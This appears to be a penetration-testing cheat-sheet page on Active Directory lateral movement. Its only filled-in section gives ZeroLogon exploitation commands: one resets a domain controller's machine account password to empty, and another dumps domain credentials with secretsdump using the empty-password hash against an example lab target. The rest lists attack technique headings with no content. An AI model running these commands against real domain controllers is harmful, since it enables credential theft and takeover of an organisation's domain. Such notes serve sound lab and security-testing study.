AD Lateral Movement
ZeroLogon Vulnerability
# set computer account password to an empty string.
$ python3 set_empty_pw.py [dc_computername] [dc_ip]
$ python3 set_empty_pw.py xor-dc01 10.11.1.120
# dump domain creds
$ python secretsdump.py -hashes :[empty_password_hash] '[domain]/[dc_computername]$@[dc_ip]'
$ python secretsdump.py -hashes :31d6cfe0d16ae931b73c59d7e0c089c0 'xor/[email protected]'Password Spraying
Plaintext Credentials
Service Account Attacks
Pass the Hash
Overpass the Hash
Pass the Ticket
Silver Ticket
Distributed Component Object Model (DCOM)
DCOM - create payload and VBA macro
Last updated